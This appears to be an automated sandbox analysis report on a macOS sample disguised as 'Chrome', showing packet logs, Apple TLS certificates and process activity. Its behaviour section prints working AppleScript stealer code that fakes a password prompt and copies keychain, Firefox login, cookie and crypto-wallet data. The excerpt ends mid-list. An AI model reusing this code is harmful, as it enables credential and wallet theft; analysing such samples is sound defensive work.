                                        Mar 14, 2025 13:10:16.250963926 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.270095110 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.271843910 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.271857977 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.271867990 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.272082090 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.272699118 CET49350443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.272728920 CET49350443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.273685932 CET49350443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.283878088 CET49350443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.310753107 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.324810982 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:16.325444937 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:16.325489044 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:16.325517893 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:16.326159954 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.326244116 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.368242979 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.368695974 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.368710995 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.368899107 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.369587898 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.369757891 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.372148991 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.377429008 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.401338100 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.401355028 CET44349350151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.402113914 CET49350443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.428493977 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.429219961 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.430131912 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.547645092 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.548883915 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.548923016 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.548981905 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.549027920 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.550052881 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.550126076 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.550383091 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.556819916 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.663232088 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:16.663249016 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:16.663777113 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.664061069 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.674390078 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.674577951 CET44349352151.101.67.6192.168.11.12
                                        Mar 14, 2025 13:10:16.675086975 CET49352443192.168.11.12151.101.67.6
                                        Mar 14, 2025 13:10:16.699017048 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.771733999 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.776151896 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.776396990 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.776494026 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.777513027 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:16.816508055 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.817198992 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.861574888 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:16.979146957 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:16.980355024 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:17.048100948 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:17.061724901 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.061733007 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.062025070 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.062776089 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.063113928 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.063365936 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.063373089 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.063378096 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.064469099 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.064646006 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.064646006 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.073159933 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.083228111 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.084357023 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.093233109 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.094068050 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.103285074 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.113373995 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.114149094 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.123457909 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.124377012 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.133435011 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.143620968 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.144597054 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.153548956 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.163537979 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.164212942 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.165582895 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:17.166057110 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:17.348587036 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.353634119 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.354305983 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.363708973 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.373568058 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.374494076 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.383557081 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.393697023 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.395159006 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:17.403620958 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:17.405174971 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:18.639266014 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:18.874691010 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:18.876328945 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:18.925153971 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:18.991956949 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:18.991967916 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:18.993227005 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:18.993227005 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:18.993377924 CET4434935117.253.7.136192.168.11.12
                                        Mar 14, 2025 13:10:18.993866920 CET49351443192.168.11.1217.253.7.136
                                        Mar 14, 2025 13:10:19.601519108 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:19.603684902 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:19.887309074 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:19.889374018 CET4434934817.248.195.72192.168.11.12
                                        Mar 14, 2025 13:10:19.889586926 CET49348443192.168.11.1217.248.195.72
                                        Mar 14, 2025 13:10:44.563577890 CET4934480192.168.11.12184.31.53.25
                                        Mar 14, 2025 13:10:44.681241035 CET8049344184.31.53.25192.168.11.12
                                        Mar 14, 2025 13:10:44.683089018 CET4934480192.168.11.12184.31.53.25
                                        Mar 14, 2025 13:10:59.443049908 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.443140030 CET44349391151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:10:59.443720102 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.444665909 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.444719076 CET44349391151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:10:59.710525990 CET44349391151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:10:59.712315083 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.712496042 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.811923981 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.812035084 CET44349391151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:10:59.812185049 CET44349391151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:10:59.812685966 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.812794924 CET49391443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.846337080 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.846366882 CET44349392151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:10:59.847026110 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.848082066 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:10:59.848094940 CET44349392151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.095143080 CET44349392151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.095935106 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.095993996 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.101613045 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.101838112 CET44349392151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.102344990 CET44349392151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.102524996 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.102807045 CET49392443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.124536037 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.124620914 CET44349393151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.125195026 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.126497030 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.126549959 CET44349393151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.179436922 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.179548979 CET44349394151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.180162907 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.181173086 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.181229115 CET44349394151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.375427961 CET44349393151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.377322912 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.377367020 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.383764982 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.383936882 CET44349393151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.384314060 CET44349393151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.384494066 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.384700060 CET49393443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.402122974 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.402219057 CET44349395151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.402847052 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.403656006 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.403709888 CET44349395151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.429733992 CET44349394151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.430715084 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.430773020 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.447793961 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.448031902 CET44349394151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.448481083 CET44349394151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.448611975 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.448837996 CET49394443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.497436047 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.497546911 CET44349396151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.498166084 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.498935938 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.498990059 CET44349396151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.653004885 CET44349395151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.654916048 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.654972076 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.661484957 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.661628008 CET44349395151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.661995888 CET44349395151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.662271976 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.662559986 CET49395443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.747970104 CET44349396151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.748727083 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.748769999 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.759886026 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.760145903 CET44349396151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.760600090 CET44349396151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:00.760760069 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:00.761101961 CET49396443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:01.803924084 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:01.804033995 CET44349400151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:01.804899931 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:01.805875063 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:01.805927038 CET44349400151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:02.054383039 CET44349400151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:02.055551052 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:02.055612087 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:02.061244011 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:02.061486959 CET44349400151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:02.062009096 CET44349400151.101.3.6192.168.11.12
                                        Mar 14, 2025 13:11:02.062097073 CET49400443192.168.11.12151.101.3.6
                                        Mar 14, 2025 13:11:02.062582016 CET49400443192.168.11.12151.101.3.6
                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 14, 2025 13:10:39.223273993 CET53567981.1.1.1192.168.11.12
                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Mar 14, 2025 13:10:16.271867990 CET151.101.67.6443192.168.11.1249350CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Feb 04 19:54:22 CET 2025 Wed Apr 29 14:54:50 CEST 2020Tue Nov 18 20:40:14 CET 2025 Thu Apr 11 01:59:59 CEST 2030
                                        CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030
                                        Mar 14, 2025 13:10:16.325517893 CET17.248.195.72443192.168.11.1249348CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=USCN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US C=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3Mon Oct 28 07:43:49 CET 2024 Wed Dec 12 13:00:00 CET 2018 Mon Dec 18 22:12:39 CET 2023Tue Nov 18 21:36:07 CET 2025 Wed Dec 11 13:00:00 CET 2030 Wed Dec 05 01:00:00 CET 2029
                                        CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=USCN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USWed Dec 12 13:00:00 CET 2018Wed Dec 11 13:00:00 CET 2030
                                        CN=Apple Public Server ECC CA 1 - G1, O=Apple Inc., C=USC=US, O=Apple Inc., OU=Apple Certification Authority, CN=Apple Root CA - G3Mon Dec 18 22:12:39 CET 2023Wed Dec 05 01:00:00 CET 2029
                                        Mar 14, 2025 13:10:16.368899107 CET17.253.7.136443192.168.11.1249351CN=mesu.apple.com, O=Apple Inc., ST=California, C=US C=US, ST=California, O=Apple Inc., CN=Apple Public Server ECC CA 11 - G1 CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBC=US, ST=California, O=Apple Inc., CN=Apple Public Server ECC CA 11 - G1 CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon Mar 10 00:50:20 CET 2025 Wed Jun 19 02:00:00 CEST 2019 Thu Mar 06 01:00:00 CET 2008Tue Dec 23 19:48:50 CET 2025 Thu Dec 05 00:59:59 CET 2030 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                        C=US, ST=California, O=Apple Inc., CN=Apple Public Server ECC CA 11 - G1CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jun 19 02:00:00 CEST 2019Thu Dec 05 00:59:59 CET 2030
                                        CN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO ECC Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Mar 06 01:00:00 CET 2008Tue Jan 19 00:59:59 CET 2038
                                        Mar 14, 2025 13:10:16.548981905 CET151.101.67.6443192.168.11.1249352CN=bag.itunes.apple.com, O=Apple Inc., L=Cupertino, ST=California, C=US, SERIALNUMBER=C0806592, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.2.5.4.15=Private Organization CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Feb 04 19:54:22 CET 2025 Wed Apr 29 14:54:50 CEST 2020Tue Nov 18 20:40:14 CET 2025 Thu Apr 11 01:59:59 CEST 2030771,49196-49195-49188-49187-49162-49161-52393-49200-49199-49192-49191-49172-49171-52392-157-156-61-60-53-47-49160-49170-10,65281-0-23-13-5-13172-18-16-11-10,29-23-24-25,05c118da645babe52f060d0754256a73c
                                        CN=Apple Public EV Server RSA CA 2 - G1, O=Apple Inc., C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Apr 29 14:54:50 CEST 2020Thu Apr 11 01:59:59 CEST 2030

                                        System Behavior

                                        Start time (UTC):12:10:14
                                        Start date (UTC):14/03/2025
                                        Path:/usr/libexec/xpcproxy
                                        Arguments:-
                                        File size:44048 bytes
                                        MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6
                                        Start time (UTC):12:10:14
                                        Start date (UTC):14/03/2025
                                        Path:/usr/libexec/nsurlstoraged
                                        Arguments:/usr/libexec/nsurlstoraged --privileged
                                        File size:246624 bytes
                                        MD5 hash:321b0a40e24b45f0af49ba42742b3f64
                                        Start time (UTC):12:10:21
                                        Start date (UTC):14/03/2025
                                        Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
                                        Arguments:-
                                        File size:3722408 bytes
                                        MD5 hash:8910349f44a940d8d79318367855b236
                                        Start time (UTC):12:10:21
                                        Start date (UTC):14/03/2025
                                        Path:/Users/bernard/Desktop/Chrome
                                        Arguments:/Users/bernard/Desktop/Chrome
                                        File size:151280 bytes
                                        MD5 hash:72676069d026c215aef39c18314a2744
                                        Start time (UTC):12:10:21
                                        Start date (UTC):14/03/2025
                                        Path:/bin/sh
                                        Arguments:-
                                        File size:618480 bytes
                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                        Start time (UTC):12:10:21
                                        Start date (UTC):14/03/2025
                                        Path:/usr/bin/osascript
                                        Arguments:osascript -e tell application 'terminal' to set visible of the front window to false
                                        File size:43232 bytes
                                        MD5 hash:f13b7c85f3c1c08fae3b709a536281a1
                                        Start time (UTC):12:10:21
                                        Start date (UTC):14/03/2025
                                        Path:/bin/sh
                                        Arguments:-
                                        File size:618480 bytes
                                        MD5 hash:be55e8952a262d0e524239dbf82191ed
                                        Start time (UTC):12:10:21
                                        Start date (UTC):14/03/2025
                                        Path:/usr/bin/osascript
                                        Arguments:osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorreturn 'not found'end tryend GetUUIDon firewallets(firepath, savePath)tryset fire_wallets to {{'MetaMask', 'webextension@metamask.io\\\':\\\''}}repeat with wallet in fire_walletsset uuid to GetUUID(firepath & '/prefs.js', item 2 of wallet)if uuid is not 'not found' thenset walkpath to firepath & '/storage/default/'set fileList to list folder walkpath without invisiblesrepeat with currentItem in fileListif (currentItem contains uuid) and (currentItem contains 'userContext') thenset fwallet to walkpath & currentItem & '/idb/'set fileList_wallet to list folder fwallet without invisiblesrepeat with currentItem_wallet in fileList_walletif isDirectory(fwallet & currentItem_wallet) thenGrabFolder(fwallet & currentItem_wallet, savePath & '/' & item 1 of wallet & '/')end ifend repeatend ifend repeatend ifend repeatend tryend firewalletson parseFF(browsername, firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'gecko/' & browsername & '_' & currentItemfirewallets(firefox & currentItem, fpath)set readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper. Please enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'ldinpeekobnhjjdofggfgjlcehhmanlj', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'jbkgjmpfammbgejcpedggoefddacbdia', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'nebnhfamliijlghikdgcigoebonmoibm', 'fdcnegogpncmfejlfnffnofpngdiejii', 'mfhbebgoclkghebffdldpobeajmbecfk', 